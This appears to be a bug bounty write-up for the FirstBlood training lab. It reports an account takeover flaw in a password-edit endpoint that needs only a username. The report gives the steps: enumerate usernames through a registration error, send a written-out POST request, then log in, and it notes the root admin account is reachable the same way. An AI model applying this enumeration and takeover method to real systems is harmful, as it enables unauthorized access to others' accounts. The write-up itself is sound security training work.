FirstBlood-#899Editpassword Function lead to ATO fore any users
This issue was discovered on FirstBlood v2

On 2021-10-30, 0xirfan Level 5 reported:


When looking at the Source Code of /drpanel/index.php# i found an Interesting Comment

So i tried it to change password of any user and it worked


From the comments I got some idea about the Request

Request Path : /drpanel/drapi/editpassword.php
Request Method : POST
Content-Type: application/x-www-form-urlencoded
body : username=

So the only data required to change the password of a doctor was his username. Thankfully firstblood has a user enumeration bug in the /register.php

If a username previously registered with firstblood is used with inviteCode test it will lead to an error "This invite code is not valid.". We can use this Information to enumerate usernames


  1. Use the Intruder at /register.php to enumerate Usernames
  2. After that Send this Request with Usernames's You enumerated

    POST /drpanel/drapi/editpassword.php HTTP/1.1
    Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Length: 14

3.Login with the username and updated password


Doctor ATO

P2 High



FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.

Report Feedback


Creator & Administrator

Actually this bug could be used to gain access to the drAdmin account which is the main root admin account. This could be found from the different error message on FirstBlood v2, or from the previous policy on FirstBlood v1 :) Nice find though!